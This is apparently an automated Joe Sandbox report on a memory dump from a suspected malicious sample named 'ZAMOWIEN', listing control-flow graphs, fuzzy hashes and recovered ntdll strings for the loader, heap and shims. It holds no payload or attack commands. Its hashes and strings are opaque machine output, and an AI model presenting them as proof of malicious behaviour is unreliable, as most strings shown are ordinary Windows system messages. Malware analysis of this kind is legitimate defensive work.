                                                                            • Instruction ID: 4632baa7a6ffc2982c4ebe418d1f422cfab746f5946955fd86abb0c0832bf0cb
                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction Fuzzy Hash:

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1127 32832890-328328b3 1128 3286a4bc-3286a4c0 1127->1128 1129 328328b9-328328cc 1127->1129 1128->1129 1130 3286a4c6-3286a4ca 1128->1130 1131 328328ce-328328d7 1129->1131 1132 328328dd-328328df 1129->1132 1130->1129 1133 3286a4d0-3286a4d4 1130->1133 1131->1132 1135 3286a57e-3286a585 1131->1135 1134 328328e1-328328e5 1132->1134 1133->1129 1136 3286a4da-3286a4de 1133->1136 1137 328328eb-328328fa 1134->1137 1138 32832988-3283298e 1134->1138 1135->1132 1136->1129 1139 3286a4e4-3286a4eb 1136->1139 1140 32832900-32832905 1137->1140 1141 3286a58a-3286a58d 1137->1141 1142 32832908-3283290c 1138->1142 1143 3286a564-3286a56c 1139->1143 1144 3286a4ed-3286a4f4 1139->1144 1140->1142 1141->1142 1142->1134 1145 3283290e-3283291b 1142->1145 1143->1129 1146 3286a572-3286a576 1143->1146 1147 3286a4f6-3286a4fe 1144->1147 1148 3286a50b 1144->1148 1149 32832921 1145->1149 1150 3286a592-3286a599 1145->1150 1146->1129 1151 3286a57c call 32840050 1146->1151 1147->1129 1152 3286a504-3286a509 1147->1152 1153 3286a510-3286a536 call 32840050 1148->1153 1154 32832924-32832926 1149->1154 1156 3286a5a1-3286a5c9 call 32840050 1150->1156 1169 3286a55d-3286a55f 1151->1169 1152->1153 1153->1169 1158 32832993-32832995 1154->1158 1159 32832928-3283292a 1154->1159 1158->1159 1163 32832997-328329b1 call 32840050 1158->1163 1164 32832946-32832966 call 32840050 1159->1164 1165 3283292c-3283292e 1159->1165 1177 32832969-32832974 1163->1177 1164->1177 1165->1164 1166 32832930-32832944 call 32840050 1165->1166 1166->1164 1174 32832981-32832985 1169->1174 1177->1154 1178 32832976-32832979 1177->1178 1178->1156 1179 3283297f 1178->1179 1179->1174
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: bab2fa798e2f697ad54890f96820d7101f07cf117253881ed69c810ac20c1529
                                                                            • Instruction ID: 454f20751fed4386bd6fd8dbc7bbf7e06334d37b97f7ebe3301219993be75d05
                                                                            • Opcode Fuzzy Hash: bab2fa798e2f697ad54890f96820d7101f07cf117253881ed69c810ac20c1529
                                                                            • Instruction Fuzzy Hash: 7551F9BDA0021AAFDB15DFA8C88097EF7B8BB083457508169E9A8D7645D634DE40CBE0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1180 328a2410-328a2433 1181 328a2439-328a243d 1180->1181 1182 328a24ec-328a24ff 1180->1182 1181->1182 1183 328a2443-328a2447 1181->1183 1184 328a2513-328a2515 1182->1184 1185 328a2501-328a250a 1182->1185 1183->1182 1186 328a244d-328a2451 1183->1186 1188 328a2517-328a251b 1184->1188 1185->1184 1187 328a250c 1185->1187 1186->1182 1189 328a2457-328a245b 1186->1189 1187->1184 1190 328a2538-328a253e 1188->1190 1191 328a251d-328a252c 1188->1191 1189->1182 1192 328a2461-328a2468 1189->1192 1195 328a2543-328a2547 1190->1195 1193 328a252e-328a2536 1191->1193 1194 328a2540 1191->1194 1196 328a246a-328a2471 1192->1196 1197 328a24b6-328a24be 1192->1197 1193->1195 1194->1195 1195->1188 1198 328a2549-328a2556 1195->1198 1199 328a2473-328a247b 1196->1199 1200 328a2484 1196->1200 1197->1182 1203 328a24c0-328a24c4 1197->1203 1201 328a2558-328a2562 1198->1201 1202 328a2564 1198->1202 1199->1182 1204 328a247d-328a2482 1199->1204 1205 328a2489-328a24ab call 32840510 1200->1205 1206 328a2567-328a2569 1201->1206 1202->1206 1203->1182 1207 328a24c6-328a24ea call 32840510 1203->1207 1204->1205 1218 328a24ae-328a24b1 1205->1218 1208 328a256b-328a256d 1206->1208 1209 328a258d-328a258f 1206->1209 1207->1218 1208->1209 1212 328a256f-328a258b call 32840510 1208->1212 1214 328a25ae-328a25d0 call 32840510 1209->1214 1215 328a2591-328a2593 1209->1215 1225 328a25d3-328a25df 1212->1225 1214->1225 1215->1214 1219 328a2595-328a25ab call 32840510 1215->1219 1224 328a2615-328a2619 1218->1224 1219->1214 1225->1206 1227 328a25e1-328a25e4 1225->1227 1228 328a2613 1227->1228 1229 328a25e6-328a2610 call 32840510 1227->1229 1228->1224 1229->1228
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 5f85d21d48cf2b7c13c0092da3015c0956c28e87a73e2db624856fd658872e56
                                                                            • Instruction ID: fbad413abda5eaefcb943d0fdc69c0489f8956a06546eaf54057446e8e1fb6e0
                                                                            • Opcode Fuzzy Hash: 5f85d21d48cf2b7c13c0092da3015c0956c28e87a73e2db624856fd658872e56
                                                                            • Instruction Fuzzy Hash: 6F51057DA00649AFEB34CF9CC8A097FB7F9EB44340B408459E4A9D7645EE74DA50CB60

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1429 328ca670-328ca6e9 call 32802410 * 2 RtlDebugPrintTimes 1435 328ca89f-328ca8c4 call 328025b0 * 2 call 32834c30 1429->1435 1436 328ca6ef-328ca6fa 1429->1436 1438 328ca6fc-328ca709 1436->1438 1439 328ca724 1436->1439 1442 328ca70f-328ca715 1438->1442 1443 328ca70b-328ca70d 1438->1443 1440 328ca728-328ca734 1439->1440 1444 328ca741-328ca743 1440->1444 1446 328ca71b-328ca722 1442->1446 1447 328ca7f3-328ca7f5 1442->1447 1443->1442 1448 328ca745-328ca747 1444->1448 1449 328ca736-328ca73c 1444->1449 1446->1440 1450 328ca81f-328ca821 1447->1450 1448->1450 1452 328ca74c-328ca750 1449->1452 1453 328ca73e 1449->1453 1454 328ca755-328ca77d RtlDebugPrintTimes 1450->1454 1455 328ca827-328ca834 1450->1455 1458 328ca86c-328ca86e 1452->1458 1453->1444 1454->1435 1467 328ca783-328ca7a0 RtlDebugPrintTimes 1454->1467 1459 328ca85a-328ca866 1455->1459 1460 328ca836-328ca843 1455->1460 1458->1450 1461 328ca87b-328ca87d 1459->1461 1463 328ca84b-328ca851 1460->1463 1464 328ca845-328ca849 1460->1464 1465 328ca87f-328ca881 1461->1465 1466 328ca870-328ca876 1461->1466 1468 328ca96b-328ca96d 1463->1468 1469 328ca857 1463->1469 1464->1463 1470 328ca883-328ca889 1465->1470 1471 328ca878 1466->1471 1472 328ca8c7-328ca8cb 1466->1472 1467->1435 1477 328ca7a6-328ca7cc RtlDebugPrintTimes 1467->1477 1468->1470 1469->1459 1474 328ca88b-328ca89d RtlDebugPrintTimes 1470->1474 1475 328ca8d0-328ca8f4 RtlDebugPrintTimes 1470->1475 1471->1461 1473 328ca99f-328ca9a1 1472->1473 1474->1435 1475->1435 1480 328ca8f6-328ca913 RtlDebugPrintTimes 1475->1480 1477->1435 1482 328ca7d2-328ca7d4 1477->1482 1480->1435 1489 328ca915-328ca944 RtlDebugPrintTimes 1480->1489 1483 328ca7d6-328ca7e3 1482->1483 1484 328ca7f7-328ca80a 1482->1484 1486 328ca7eb-328ca7f1 1483->1486 1487 328ca7e5-328ca7e9 1483->1487 1488 328ca817-328ca819 1484->1488 1486->1447 1486->1484 1487->1486 1490 328ca80c-328ca812 1488->1490 1491 328ca81b-328ca81d 1488->1491 1489->1435 1495 328ca94a-328ca94c 1489->1495 1492 328ca868-328ca86a 1490->1492 1493 328ca814 1490->1493 1491->1450 1492->1458 1493->1488 1496 328ca94e-328ca95b 1495->1496 1497 328ca972-328ca985 1495->1497 1499 328ca95d-328ca961 1496->1499 1500 328ca963-328ca969 1496->1500 1498 328ca992-328ca994 1497->1498 1501 328ca996 1498->1501 1502 328ca987-328ca98d 1498->1502 1499->1500 1500->1468 1500->1497 1501->1465 1503 328ca98f 1502->1503 1504 328ca99b-328ca99d 1502->1504 1503->1498 1504->1473
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: HEAP:
                                                                            • API String ID: 3446177414-2466845122
                                                                            • Opcode ID: 80d1b06163b8a81653ca0714e6050355d6bd9fc3d6e1dfa82bd11294f37cf6da
                                                                            • Instruction ID: 40292a45197e9ae4f63b48bd34eaa167ffac38c570e0dd617fed3bf65518cf44
                                                                            • Opcode Fuzzy Hash: 80d1b06163b8a81653ca0714e6050355d6bd9fc3d6e1dfa82bd11294f37cf6da
                                                                            • Instruction Fuzzy Hash: 4AA1AE79A183218FD708CE28C890A5AB7E5FF88354F05496DE989DB350EB70DC46CB91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1505 32827630-32827651 1506 32827653-3282766f call 327fe660 1505->1506 1507 3282768b-32827699 call 32834c30 1505->1507 1512 32827675-32827682 1506->1512 1513 32864638 1506->1513 1514 32827684 1512->1514 1515 3282769a-328276a9 call 32827818 1512->1515 1517 3286463f-32864645 1513->1517 1514->1507 1521 32827701-3282770a 1515->1521 1522 328276ab-328276c1 call 328277cd 1515->1522 1519 328276c7-328276d0 call 32827728 1517->1519 1520 3286464b-328646b8 call 3287f290 call 32839020 RtlDebugPrintTimes BaseQueryModuleData 1517->1520 1519->1521 1530 328276d2 1519->1530 1520->1519 1539 328646be-328646c6 1520->1539 1525 328276d8-328276e1 1521->1525 1522->1517 1522->1519 1532 328276e3-328276f2 call 3282771b 1525->1532 1533 3282770c-3282770e 1525->1533 1530->1525 1534 328276f4-328276f6 1532->1534 1533->1534 1537 32827710-32827719 1534->1537 1538 328276f8-328276fa 1534->1538 1537->1538 1538->1514 1541 328276fc 1538->1541 1539->1519 1542 328646cc-328646d3 1539->1542 1544 328647be-328647d0 call 32832c50 1541->1544 1542->1519 1543 328646d9-328646e4 1542->1543 1545 328646ea-32864723 call 3287f290 call 3283aaa0 1543->1545 1546 328647b9 call 32834d48 1543->1546 1544->1514 1554 32864725-32864736 call 3287f290 1545->1554 1555 3286473b-3286476b call 3287f290 1545->1555 1546->1544 1554->1521 1555->1519 1560 32864771-3286477f call 3283a770 1555->1560 1563 32864786-328647a3 call 3287f290 call 3286cf9e 1560->1563 1564 32864781-32864783 1560->1564 1563->1519 1569 328647a9-328647b2 1563->1569 1564->1563 1569->1560 1570 328647b4 1569->1570 1570->1519
                                                                            Strings
                                                                            • Execute=1, xrefs: 32864713
                                                                            • ExecuteOptions, xrefs: 328646A0
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 32864787
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32864742
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32864725
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 328646FC
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32864655
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: 40a3fa420e2f238464b0d140545d5e8f3c8cf53de40f08f315b900ad3634dc37
                                                                            • Instruction ID: fedad007f0fdfcac708e9fe7bd5e9ea5280c7a6a170e23b5db1241c39cbc4cf0
                                                                            • Opcode Fuzzy Hash: 40a3fa420e2f238464b0d140545d5e8f3c8cf53de40f08f315b900ad3634dc37
                                                                            • Instruction Fuzzy Hash: 0351297D60131DAEFB11DAAADC85FAD77B8BF14344F4000E9DA18AB181EB709A85CF50
                                                                            Strings
                                                                            • SsHd, xrefs: 3280A3E4
                                                                            • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32857AE6
                                                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328579FA
                                                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 328579D5
                                                                            • Actx , xrefs: 32857A0C, 32857A73
                                                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 328579D0, 328579F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                            • API String ID: 0-1988757188
                                                                            • Opcode ID: 79681414200eb859aedf6e2e8877a1ff55503c5f2aeddd746a2d72b555f3b911
                                                                            • Instruction ID: 5385fc8b1e36b336ff756b8402a9a507bf5d12d679bf5c3a146c3f8a66664b0a
                                                                            • Opcode Fuzzy Hash: 79681414200eb859aedf6e2e8877a1ff55503c5f2aeddd746a2d72b555f3b911
                                                                            • Instruction Fuzzy Hash: 74E1D07D6043019FE715CE24CC84B9AB7E1BB88358F54CA2DFA698B291DB31D949CF41
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                            • API String ID: 3446177414-4227709934
                                                                            • Opcode ID: 3c9428472764ff48cfb43c4aa738dd4472dfdb6214944ee661f3aa8391950afc
                                                                            • Instruction ID: f68cc1d9bb7571a92e73d0ad83a40b88d60ac9014131e1ddb440c9018aa4fbeb
                                                                            • Opcode Fuzzy Hash: 3c9428472764ff48cfb43c4aa738dd4472dfdb6214944ee661f3aa8391950afc
                                                                            • Instruction Fuzzy Hash: 8E4180B9A01208ABDB01DF99C940AEEBFB5BF58308F100059EE19AB341C771ED51CB90
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                            • API String ID: 3446177414-3492000579
                                                                            • Opcode ID: 91eb042f33c4a8db1b4b311687790180d99cd614cfe60337b3768c809019c810
                                                                            • Instruction ID: 8286259fc298c8ceac4f4914f935de2aebd2c5b1f2b746e68d7b7b7fbb945234
                                                                            • Opcode Fuzzy Hash: 91eb042f33c4a8db1b4b311687790180d99cd614cfe60337b3768c809019c810
                                                                            • Instruction Fuzzy Hash: 1371CE79911289DFDB0ACFA8C4507EEFBF2BF5A304F048459E449AB692CF719981CB50
                                                                            APIs
                                                                            Strings
                                                                            • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32849AB4
                                                                            • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32849AF6
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 32849AC5, 32849B06
                                                                            • LdrpLoadShimEngine, xrefs: 32849ABB, 32849AFC
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-3589223738
                                                                            • Opcode ID: 3638be64b0762a591eb284aeca2a2f4f32a5526ca963c8c20ea16ac75707b1ad
                                                                            • Instruction ID: 3add09165659ad3ffd28be0af97833d6a0e0cc83e116fca05fa46010c6dbad48
                                                                            • Opcode Fuzzy Hash: 3638be64b0762a591eb284aeca2a2f4f32a5526ca963c8c20ea16ac75707b1ad
                                                                            • Instruction Fuzzy Hash: 0D510379B21358DFDB24DB6CCC45BAD77A2BB44304F04056AE551BF295DBB0AC82CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                            • Instruction ID: c2fff0736d544ef8630d9ecc665d0d16cc5f386081320cfb11007924adbfbe18
                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                            • Instruction Fuzzy Hash: 2C0225B9508361AFD305CF28C490A6BF7E5EFC8714F508A2DFA984B264DB71E905CB42
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                            • Instruction ID: 7ae3be4af1e76589af01a944c6e4f33a8d73cd1016331207c91cc02ad3f4610d
                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                            • Instruction Fuzzy Hash: 2081C1FCE072498FEF068E6CC8517EEBBA1EF45394F54451ADA64A7292DB348840CBD0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$@
                                                                            • API String ID: 3446177414-1194432280
                                                                            • Opcode ID: b32f26b40b4a456f0dcbc6e29ea5a405355e735b7ab3ff858451ad1cf5e65602
                                                                            • Instruction ID: 6e668eb773aa8d0971c0b27ccb89ded69c991fe0a4fae406ae745be8344278de
                                                                            • Opcode Fuzzy Hash: b32f26b40b4a456f0dcbc6e29ea5a405355e735b7ab3ff858451ad1cf5e65602
                                                                            • Instruction Fuzzy Hash: B9811CB9D00269DBDB25CF54CC44BDEB7B4AB08754F1041EAA919B7280DB719E85CFA0
                                                                            APIs
                                                                            Strings
                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 3286362F
                                                                            • LdrpFindDllActivationContext, xrefs: 32863636, 32863662
                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 32863640, 3286366C
                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 3286365C
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 3446177414-3779518884
                                                                            • Opcode ID: 55d54f949deed617a8b58c6d775ad208d145ffab09a61799226008a7d1800b90
                                                                            • Instruction ID: 0d1b22004ee3452e6b52e0d96bb7625c856b81941458d7fd1590d3369c65e948
                                                                            • Opcode Fuzzy Hash: 55d54f949deed617a8b58c6d775ad208d145ffab09a61799226008a7d1800b90
                                                                            • Instruction Fuzzy Hash: A931D3BE941755EEEB119B08C848B6577A4FB01B98F42416AED0C67291DFA0BCC0CAB5
                                                                            Strings
                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3285A992
                                                                            • LdrpDynamicShimModule, xrefs: 3285A998
                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 3285A9A2
                                                                            • TG|2, xrefs: 32812462
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG|2$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 0-2063368474
                                                                            • Opcode ID: 8278036ccae39f640a20038e609a35968319a6ea869ef8cbd6142a71ffbf6f92
                                                                            • Instruction ID: 7c71f3620f322411493f8fc82fa8480ad03c3feb52c387559d99910f84caf844
                                                                            • Opcode Fuzzy Hash: 8278036ccae39f640a20038e609a35968319a6ea869ef8cbd6142a71ffbf6f92
                                                                            • Instruction Fuzzy Hash: 0831597D651325EBE7159F58C881FAA7BB5FB84754F224459F9247B280CBB06CC2CB80
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true
                                                                            • Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$[$]:%u
                                                                            • API String ID: 48624451-2819853543
                                                                            • Opcode ID: 2c08b11d669834ba288fdcde6ab1eefaa019da339b6ce859fcd03ee9ade38ac2
